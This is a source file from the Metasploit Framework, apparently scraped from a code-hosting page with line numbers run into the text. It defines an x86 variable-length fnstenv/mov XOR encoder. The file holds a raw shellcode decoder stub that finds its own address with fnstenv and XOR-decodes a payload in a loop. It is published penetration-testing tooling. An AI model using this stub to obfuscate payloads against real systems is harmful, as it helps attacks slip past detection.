Path: blob/master/modules/encoders/x86/fnstenv_mov.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder',10'Description' => %q{11This encoder uses a variable-length mov equivalent instruction12with fnstenv for getip.13},14'Author' => 'spoonm',15'Arch' => ARCH_X86,16'License' => MSF_LICENSE,17'Decoder' => {18'KeySize' => 4,19'BlockSize' => 420})21end2223#24# Returns the decoder stub that is adjusted for the size of the buffer25# being encoded.26#27def decoder_stub(state)28# Sanity check that saved_registers doesn't overlap with modified_registers29if !(modified_registers & saved_registers).empty?30raise BadGenerateError31end3233decoder =34Rex::Arch::X86.set(35Rex::Arch::X86::ECX,36(((state.buf.length - 1) / 4) + 1),37state.badchars38) +39"\xd9\xee" + # fldz40"\xd9\x74\x24\xf4" + # fnstenv [esp - 12]41"\x5b" + # pop ebx42"\x81\x73\x13XORK" + # xor_xor: xor DWORD [ebx + 22], xorkey43"\x83\xeb\xfc" + # sub ebx,-444"\xe2\xf4" # loop xor_xor4546state.decoder_key_offset = decoder.index('XORK')4748return decoder49end5051# Indicate that this module can preserve some registers52def can_preserve_registers?53true54end5556# A list of registers always touched by this encoder57def modified_registers58[ Rex::Arch::X86::EBX, Rex::Arch::X86::ECX ]59end6061# Convert the SaveRegisters to an array of x86 register constants62def saved_registers63Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])64end65end666768